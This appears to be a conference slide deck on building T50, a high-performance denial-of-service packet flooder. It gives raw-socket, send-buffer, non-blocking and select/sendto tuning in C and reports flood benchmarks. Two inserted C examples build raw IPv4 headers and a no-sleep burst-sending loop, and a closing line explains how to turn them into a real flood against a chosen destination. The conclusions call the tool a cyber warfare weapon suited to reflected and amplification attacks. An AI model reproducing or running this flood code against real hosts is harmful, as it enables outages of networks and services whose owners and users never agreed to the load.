The Hangover
A “modern” (?) high performance approach to build an offensive computing tool!




                                                                            Nelson Brito
                                                                nbrito[at]sekure[dot]org
Agenda

• 0000 – Introduction
• 0001 – Motivation
• 0010 – “Hello World” Examples
• 0011 – Lessons Learned
• 0100 – Comparison
• 0101 – Results
• 0110 – Demonstration
• 0111 – Conclusions
• 1000 – Questions and Answers
0000 – Introduction
Denial-of-Service
0001 – Motivation
Goals
• Firstly, the primary goal of this research was to build a
  “PERFECT” tool to use in my daily tasks.

• Secondly, to gain enough knowledge and perspective on how network
  devices and computer systems behave under this type of attack.

• Thirdly, to prove that DoS was and still is a BIG ISSUE for the whole
  Internet infrastructure.

• Lastly, but not least:
   – “The best is yet to come!”
      • http://fnstenv.blogspot.com/2010/08/best-is-yet-to-come.html
   – “A fake version of T50!!!”
      • http://fnstenv.blogspot.com/2010/10/fake-version-of-t50.html
Why Denial-of-Service?
• Is there anything more offensive than a DoS, anyway?
   – Bear in mind: DoS means “Stress Testing” for this presentation.

• DoS tools are necessary weapons in a cyber warfare…

• Attacks against the infrastructure are more common than many people
  might think, and, when they happen, people will certainly be aware
  of them.

• But what are the real damages? What are the real motivations? Image?
  Revenge? Financial? Political? Hacktivism?

• DoS attacks are significantly harmful, because they violate one of the
  three key concepts of security that are common to risk management…
  Which one?
   – Confidentiality
   – Integrity
   – Availability

All the code in this presentation was written in the C language and
tested on real machines, rather than virtual machines.
0010 – “Hello World” Examples

Six variants of the same send loop. In Examples 01–03 main() installs a
handler with Signal() and triggers it with kill(); inside its while(),
loop() re-installs the handler with Signal() and sets alarm() again. In
Examples 04–06 main() simply calls loop() from a while(). Within each
group the per-packet malloc() and then memset() are dropped, until only
memcpy() into a buffer prepared once remains.

“Hello World” Example 01

main()                     loop()
 Signal()                   while()
 kill()                       malloc()
                              memset()
                              memcpy()
                              Signal()
                              alarm()

“Hello World” Example 02

main()                     loop()
 Signal()                   while()
 kill()                       memset()
                              memcpy()
                              Signal()
                              alarm()

“Hello World” Example 03

main()                     loop()
 Signal()                   while()
 kill()                       memcpy()
                              Signal()
                              alarm()

“Hello World” Example 04

main()                     loop()
 while()                    malloc()
   loop()                   memset()
                            memcpy()

“Hello World” Example 05

main()                     loop()
 while()                    memset()
   loop()                   memcpy()

“Hello World” Example 06

main()                     loop()
 while()                    memcpy()
   loop()

“Hello World” Examples Applied

[Chart: the six examples measured on a Dell Latitude E6400 and a Dell Inspiron 910]
0011 – Lessons Learned
Also known as “Tips and Tricks”
What is the “high-performance” definition?

English Language
• Adj.
   – 1. Modified to give superior performance: “a high-performance car”
        superior – of high or superior quality or performance;
        “superior wisdom derived from experience”; “superior math students”.

Computer Science
• Code and/or a program that solves a problem faster and more efficiently
  than ordinary code / programs.
• Code and/or a program which uses all – or as much as possible – of the
  computer’s available resources.
SOCKET(2)
• T50 Sukhoi PAK FA is capable of:
   – Sending protocol packets: ICMP, IGMP, TCP and UDP.
         • NO BIG DEAL, right?
   – Sending ALL of them “ALMOST” at the same time – protocol “T50”!
         • BIG DEAL! 8)

• How many sockets should the code use to send ALL of them “ALMOST” at the
  same time?
    – 1 socket file descriptor
    – 2 socket file descriptors
    – 4 socket file descriptors
    – 8 socket file descriptors
    – 16 socket file descriptors
    – 32 socket file descriptors
    – 64 socket file descriptors
    – NONE

• “Just one socket file descriptor? Really?”
SOCKET(2) & SETSOCKOPT(2)
typedef int socket_t;   /* local alias for a socket descriptor (assumed) */
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

   /* One raw socket carries every protocol: with IPPROTO_RAW the caller
      supplies the whole IPv4 header. Requires CAP_NET_RAW. */
   if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
       exit(EXIT_FAILURE);

   /* IP_HDRINCL is implied by IPPROTO_RAW on Linux but set explicitly; the
      kernel still fills in the checksum and total length, and a source
      address or identification left at zero. */
   if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, nptr, sizeof(n)) < 0)
       exit(EXIT_FAILURE);

[...]
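IPPROTO_RAW with IP_HDRINCL means the tool, not the kernel, supplies the IPv4 header, so every packet needs a well-formed header and, on kernels that do not fill the field in, a valid checksum. The following is an added example written for this page, not code from T50: it builds a 20-byte IPv4 header with the RFC 1071 checksum and checks the result against the widely reproduced textbook header 192.168.0.1 -> 192.168.0.199 (checksum 0xb861). Function and constant names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* RFC 1071 one's-complement checksum over len bytes, returned in host
   order. Summing byte pairs explicitly keeps it endian-independent. */
uint16_t ip_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (len & 1)                          /* odd trailing byte, zero-padded */
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)                     /* fold the carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write a 20-byte IPv4 header without options into hdr. total_len counts
   the header plus payload; proto is the L4 protocol number (17 = UDP).
   The checksum is filled in here instead of being left to the kernel.
   Returns 1 on success, 0 if an address does not parse. */
int build_ipv4_header(uint8_t hdr[20], const char *src, const char *dst,
                      uint16_t total_len, uint16_t id, uint8_t ttl,
                      uint8_t proto, int dont_fragment)
{
    struct in_addr s, d;
    uint16_t ff = dont_fragment ? 0x4000 : 0;  /* flags + fragment offset */
    uint16_t csum;

    if (inet_pton(AF_INET, src, &s) != 1 || inet_pton(AF_INET, dst, &d) != 1)
        return 0;
    memset(hdr, 0, 20);
    hdr[0] = 0x45;                            /* version 4, IHL 5 words */
    hdr[2] = total_len >> 8;  hdr[3] = total_len & 0xff;
    hdr[4] = id >> 8;         hdr[5] = id & 0xff;
    hdr[6] = ff >> 8;         hdr[7] = ff & 0xff;
    hdr[8] = ttl;
    hdr[9] = proto;                           /* hdr[10..11]: checksum, still 0 */
    memcpy(hdr + 12, &s.s_addr, 4);           /* in_addr is already network order */
    memcpy(hdr + 16, &d.s_addr, 4);
    csum = ip_checksum(hdr, 20);
    hdr[10] = csum >> 8;      hdr[11] = csum & 0xff;
    return 1;
}

/* Receiver-side check: with the checksum field included, a valid header
   sums to zero. */
int ipv4_header_ok(const uint8_t *hdr, size_t len)
{
    size_t ihl = (hdr[0] & 0x0f) * 4u;
    return len >= 20 && (hdr[0] >> 4) == 4 && ihl >= 20 && ihl <= len
        && ip_checksum(hdr, ihl) == 0;
}

/* Reference header (the textbook example): 192.168.0.1 -> 192.168.0.199,
   115 bytes total, id 0, DF set, TTL 64, UDP, checksum 0xb861. */
const uint8_t k_ref_hdr[20] = {
    0x45, 0x00, 0x00, 0x73, 0x00, 0x00, 0x40, 0x00, 0x40, 0x11,
    0xb8, 0x61, 0xc0, 0xa8, 0x00, 0x01, 0xc0, 0xa8, 0x00, 0xc7 };

/* 1 if build_ipv4_header() reproduces k_ref_hdr byte for byte. */
int build_matches_reference(void)
{
    uint8_t hdr[20];
    return build_ipv4_header(hdr, "192.168.0.1", "192.168.0.199",
                             115, 0, 64, IPPROTO_UDP, 1) == 1
        && memcmp(hdr, k_ref_hdr, 20) == 0;
}

/* Checksum of the reference header with its checksum field zeroed. */
uint16_t reference_checksum(void)
{
    uint8_t z[20];
    memcpy(z, k_ref_hdr, 20);
    z[10] = z[11] = 0;
    return ip_checksum(z, 20);
}

/* 1 if a single flipped bit in the reference header is caught. */
int reference_detects_corruption(void)
{
    uint8_t z[20];
    memcpy(z, k_ref_hdr, 20);
    z[19] ^= 0x01;
    return ipv4_header_ok(z, 20) == 0;
}

int main(void)
{
    int i;
    for (i = 0; i < 20; i++)
        printf("%02x%c", k_ref_hdr[i], i == 19 ? '\n' : ' ');
    printf("rebuilt matches: %d, verifies: %d, corruption caught: %d\n",
           build_matches_reference(), ipv4_header_ok(k_ref_hdr, 20),
           reference_detects_corruption());
    return 0;
}
```

The UDP or TCP header that follows carries its own checksum over a pseudo-header; with IP_HDRINCL the kernel does not compute that one for you either.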
GETSOCKOPT(2) & SETSOCKOPT(2)
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

   len = sizeof(n);

   /* Start from the current send buffer and grow it in 128-byte steps. */
   if(getsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, &len) == -1)
       exit(EXIT_FAILURE);

   for(n += 128 ; n < 1048576 ; n += 128){
        if(setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, len) == -1){
            if(errno == ENOBUFS)   /* limit reached: keep the last accepted size */
               break;
            exit(EXIT_FAILURE);
        }
   }
   /* Caveat: Linux clamps SO_SNDBUF to net.core.wmem_max (and doubles the
      stored value) instead of failing, so the ENOBUFS break never fires
      there; re-read with getsockopt(2) to learn the effective size. */

[...]
FCNTL(2)
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

   /* Non-blocking descriptor: sendto(2) returns EAGAIN instead of parking
      the process when the send buffer is full; select(2) decides when to retry. */
   flags = fcntl(fd, F_GETFL, 0);

   if(fcntl(fd, F_SETFL, flags|O_NONBLOCK) == -1)
       exit(EXIT_FAILURE);

[...]
IOCTL(2)
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

   /* Same effect as the fcntl(2) route: n == 1 switches FIONBIO on. */
   if(ioctl(fd, FIONBIO, &n) == -1)
       exit(EXIT_FAILURE);

[...]
SIGNAL(2) & SENDTO(2)

• “Signals are used to notify a process or thread of a particular
 event. Many computer science researchers compare signals with
 hardware interrupts, which occur when a hardware subsystem,
 such as a disk I/O (input/output) interface, generates an
 interrupt to a processor when the I/O completes.”
  – Linux Journal (Issue 73, May 2000) – By Moshe Bar

• “Signals also have been used to communicate and synchronize
 processes and to simplify interprocess communications (IPCs).
 Although we now have advanced synchronization tools and
 many IPC mechanisms, signals play a vital role in Linux for
 handling exceptions and interrupts. Signals have been used for
 approximately 30 years without any major modifications.”
  – Linux Journal (Issue 107, March 2003) – By B. Thangaraju
SIGNAL(2) & SENDTO(2)
[...]

   /* Belt and braces: ignore SIGPIPE process-wide and also pass MSG_NOSIGNAL
      per call, so an unreachable peer cannot kill the flooder. */
   signal(SIGPIPE, SIG_IGN);

[...]

redo:
   if(sendto(fd, &p, p_sz, MSG_NOSIGNAL, (struct sockaddr *)&sin, sizeof(sin)) == -1){
        if(errno == EPERM)    /* packet refused, e.g. by a netfilter rule: retry */
           goto redo;         /* caveat: a persistent EPERM spins here forever */
        else
          exit(EXIT_FAILURE);
   }
   /* EAGAIN is not handled here: with O_NONBLOCK the loop on the next slides
      waits in select(2) for writability before each sendto(2). */

[...]
SELECT(2)
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

/* Loop forever in flood mode, otherwise until the packet threshold is
   reached; block in select(2) only while the socket is not writable. */
while(flood || threshold--){
   FD_ZERO(&wfds);
   FD_SET(fd, &wfds);

   if(select(fd + 1, NULL, &wfds, NULL, NULL) == -1)
        exit(EXIT_FAILURE);

   if(FD_ISSET(fd, &wfds)){

[...]
PSELECT(2)
socket_t fd; int flags, n = 1; socklen_t len; int * nptr = &n; fd_set wfds;

[...]

/* pselect(2) variant: the extra argument is a signal mask installed
   atomically for the duration of the wait; NULL leaves the mask unchanged. */
while(flood || threshold--){
   FD_ZERO(&wfds);
   FD_SET(fd, &wfds);

   if(pselect(fd + 1, NULL, &wfds, NULL, NULL, NULL) == -1)
        exit(EXIT_FAILURE);

   if(FD_ISSET(fd, &wfds)){

[...]
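The FCNTL(2)/IOCTL(2), GETSOCKOPT(2) & SETSOCKOPT(2), SIGNAL(2) & SENDTO(2) and SELECT(2)/PSELECT(2) fragments above are pieces of one send loop. The following is an added example written for this page, not T50's own code: it grows SO_SNDBUF and reads back the effective size, switches the descriptor to O_NONBLOCK, ignores SIGPIPE, and waits in select(2) for writability between sendto(2) calls, retrying EAGAIN and (with a bound) EPERM. The raw socket needs CAP_NET_RAW; the self-check runs unprivileged over an AF_UNIX datagram socketpair with constructed 64-byte packets, which exercises the same loop. Function names, the 1000-retry EPERM budget and the socketpair self-test are this example's own choices.

```c
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

/* One raw IPv4 socket with IP_HDRINCL, as on the slides. Needs CAP_NET_RAW;
   an unprivileged caller gets -1 with errno == EPERM. */
int open_raw_ipv4(void)
{
    int one = 1, fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (fd != -1 && setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one) == -1) {
        close(fd);
        fd = -1;
    }
    return fd;
}

/* Grow SO_SNDBUF in 128-byte steps from its current value, stopping where
   the kernel refuses (ENOBUFS). Linux never refuses: it clamps to
   net.core.wmem_max and doubles silently, so the effective size is re-read
   with getsockopt(2) and returned instead of assumed. -1 on error. */
int grow_sndbuf(int fd)
{
    int n;
    socklen_t len = sizeof n;
    if (getsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, &len) == -1)
        return -1;
    for (n += 128; n < 1048576; n += 128)
        if (setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, len) == -1) {
            if (errno == ENOBUFS)
                break;
            return -1;
        }
    return getsockopt(fd, SOL_SOCKET, SO_SNDBUF, &n, &len) == -1 ? -1 : n;
}

/* fcntl(2) route to O_NONBLOCK; ioctl(fd, FIONBIO, &one) is the equivalent. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);
    return flags == -1 ? -1 : fcntl(fd, F_SETFL, flags | O_NONBLOCK);
}

/* Push count copies of pkt as fast as the socket takes them. No sleeps:
   select(2) blocks only while the send buffer is full. EAGAIN is retried;
   EPERM (packet refused, e.g. by a netfilter rule) is retried a bounded
   number of times so a persistent refusal cannot spin forever as a bare
   "goto redo" would. dst may be NULL on a connected socket.
   Returns packets sent, or -1 with errno set. */
long send_burst(int fd, const void *pkt, size_t len, long count,
                const struct sockaddr *dst, socklen_t dlen)
{
    long sent = 0;
    int eperm_budget = 1000;
    fd_set wfds;

    signal(SIGPIPE, SIG_IGN);              /* and MSG_NOSIGNAL per call */
    while (sent < count) {
        FD_ZERO(&wfds);
        FD_SET(fd, &wfds);
        if (select(fd + 1, NULL, &wfds, NULL, NULL) == -1) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (!FD_ISSET(fd, &wfds))
            continue;
        if (sendto(fd, pkt, len, MSG_NOSIGNAL, dst, dlen) == -1) {
            if (errno == EAGAIN || errno == EWOULDBLOCK)
                continue;
            if (errno == EPERM && eperm_budget-- > 0)
                continue;
            return -1;
        }
        sent++;
    }
    return sent;
}

/* Unprivileged self-check over an AF_UNIX datagram socketpair with
   constructed 64-byte packets: all 32 must arrive intact. 1 on success. */
int selftest_over_socketpair(void)
{
    int sv[2], ok, i;
    unsigned char pkt[64], got[64];
    memset(pkt, 0x41, sizeof pkt);
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) == -1)
        return 0;
    ok = set_nonblocking(sv[0]) != -1 && grow_sndbuf(sv[0]) > 0
      && send_burst(sv[0], pkt, sizeof pkt, 32, NULL, 0) == 32;
    for (i = 0; ok && i < 32; i++)
        ok = recv(sv[1], got, sizeof got, 0) == (ssize_t)sizeof got
          && memcmp(got, pkt, sizeof got) == 0;
    close(sv[0]);
    close(sv[1]);
    return ok;
}

int main(void)
{
    int fd = open_raw_ipv4();              /* -1 unless CAP_NET_RAW */
    printf("raw socket %s, socketpair self-test %s\n",
           fd == -1 ? "unavailable" : "open",
           selftest_over_socketpair() ? "pass" : "FAIL");
    return fd == -1 ? 0 : close(fd);
}
```

Build with `cc -O2 -Wall -o burst burst.c`; run as root to see the raw socket open, otherwise only the self-test runs. To drive a real flood, pass the buffer from the header-building example and a `struct sockaddr_in` for the destination to `send_burst()`.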
SLEEP(3)
• Should the code “sleep()”?
  – Yes
  – No

• Should the code “usleep()”?
  – Yes
  – No

• Should the code “nanosleep()”?
  – Yes
  – No

• The code must never SLEEP(3), USLEEP(3) or NANOSLEEP(3).
  – At gigabit rate a minimum-size frame occupies the wire for well under a
    microsecond, while even nanosleep(3) on a non-realtime kernel pauses the
    process for tens of microseconds: dozens of frames' worth of idle link per
    call. The only wait the loop takes is select(2) on writability.
RAND(3)

• “short” (16-bit)
  – Which one is faster at creating a random value?
     • ((rand()&0xffff)<<8)+(rand()&0xffff)
     • 1+(short)(65535.0*rand()/(RAND_MAX+1.0))

• “int” (32-bit)
  – Which one is faster at creating a random value?
     • ((rand()&0xffffffff)<<16)+(rand()&0xffffffff)
     • 1+(int)(4294967295.0*rand()/(RAND_MAX+1.0))

RAND(3)

[Chart: timing of the rand() recipes on a Dell Latitude E6400 and a Dell Inspiron 910]
What else?
• Prefer local variables to global variables.

• Use “__inline__” in header files (*.h) and “inline” in source files (*.c),
  enabling the GCC switches:
   – “-finline-functions” (enabled by -O3)
   – “-fkeep-inline-functions”

• Declare a function “void” if its return value is never checked.

• Should the code use “unsigned” or “signed”?

• Should the code use “fork()” or “pthread_*()”?

• Etc... And by “etc…” I mean…

• Ohh… I almost forgot!!! Make the code RFC 1918 compliant.
0100 – Comparison
com.par.i.son

English Language
• n.
   1. a. The act of comparing or the process of being compared.
      b. A statement or estimate of similarities and differences.
   2. The quality of being similar or equivalent; likeness: no comparison
      between the two books.
   3. …

C Language (Operators)
• To test for equality is “==”.
• To test for inequality is “!=”.
• Other operators:
   – “<” (less than)
   – “>” (greater than)
   – “<=” (less than or equal)
   – “>=” (greater than or equal)
com.par.i.son

TCP Flood
• C4 by live
• Geminid by live
• Mausezahn by Herbert Haas
• F22 by Nelson Brito
• [L]OTUS by labsec team
• HPING3 by Salvatore Sanfilippo*

UDP Flood
• Geminid by live
• B52 by Nelson Brito
• Mausezahn by Herbert Haas
• HPING3 by Salvatore Sanfilippo*

ICMP Flood
• Geminid by live
• Mausezahn by Herbert Haas
• HPING3 by Salvatore Sanfilippo*

IGMP
• STRESSER-0.7 by Shen139?
   – Please, don’t be silly!!!
Methodology
Why do I keep saying “ALMOST”?
0101 – Results
Minimum Frame Size (MFS)
• The maximum Ethernet frame size is 1518 bytes, although to allow the Q-tag
  for Virtual LAN and priority data in 802.3ac it is extended to 1522 bytes.

• If the upper layer protocol submits a protocol data unit (PDU) smaller than
  the minimum, 802.3 pads the data field so that the frame reaches 64 bytes.

• The Minimum Frame Size will then always be 64 bytes, but…
   – The Minimum Frame Size is related to the distance which the network spans,
     the type of media being used and the number of repeaters which the signal
     may have to pass through to reach the furthest part of the LAN: a frame
     must still be on the wire when a collision at the far end is detected.
Maximum Packets per Second (PPS) – 64 bytes

                        100BASE-TX           1000BASE-T
  Link rate             100 Mbps             1 Gbps
  bits/sec              100,000,000          1,000,000,000
  bytes/sec             12,500,000           125,000,000
  pps (64-byte frames)  195,312.50           1,953,125.00

Maximum Packets per Second (PPS) – 88 bytes

                        100BASE-TX           1000BASE-T
  Link rate             100 Mbps             1 Gbps
  bits/sec              100,000,000          1,000,000,000
  bytes/sec             12,500,000           125,000,000
  pps (88-byte frames)  142,045.45           1,420,454.55

These figures divide the byte rate by the frame size alone. On the wire every
frame is also preceded by an 8-byte preamble/SFD and followed by a 12-byte
inter-frame gap, so the true line-rate ceiling is lower: 148,809.52 pps
(64-byte frames) and 115,740.74 pps (88-byte frames) on 100BASE-TX, and ten
times those, 1,488,095.24 and 1,157,407.41 pps, on 1000BASE-T. The flood
charts that follow should be read against these ceilings.
TCP Flood

[Chart: TCP flood results on 100BASE-TX and 1000BASE-T]

UDP Flood

[Chart: UDP flood results on 100BASE-TX and 1000BASE-T]

ICMP Flood

[Chart: ICMP flood results on 100BASE-TX and 1000BASE-T]
0110 – Demonstration
T50 Sukhoi PAK FA Mixed Packet Injector Tool

Dell Latitude E6400
• Intel® Core™ 2 Duo P8400 (2.26 GHz)
• Memory 4GB RAM
• Ubuntu Desktop Linux 10.04 64-bit
• Intel® 82567LM Gigabit Controller
• 1 Gbps Network
• Cross-over Cable (CAT-5e)

Dell Latitude D620
• Intel® Core™ Duo T5600 (1.83 GHz)
• Memory 2GB RAM
• Microsoft Windows 7 32-bit
• Broadcom NetXtreme 57xx Gigabit Controller
• 1 Gbps Network
• Cross-over Cable (CAT-5e)




                          http://j.mp/T50-Demo
                              Demonstration!
0111 – Conclusions
Conclusions
• Can be applied to any DoS:
   – Peer-to-Peer Attacks
   – Application Level Attacks
   – Distributed Attacks
   – Reflected Attacks
   – Level-2 Attacks
   – Degradation-of-Service Attacks
   – DNS Amplification Attacks

• Is DoS and DDoS so 1990’s?
    – Please, don’t be silly, again!!!

• Can it be considered a cyber warfare weapon?
    – Yes, it can be considered one.

• It is just a matter of time until things get worse on the Internet.

• A DoS can be perpetrated overnight!

• What else?

An attacker does not even need multiple zombies.
1000 – Questions & Answers
Any questions?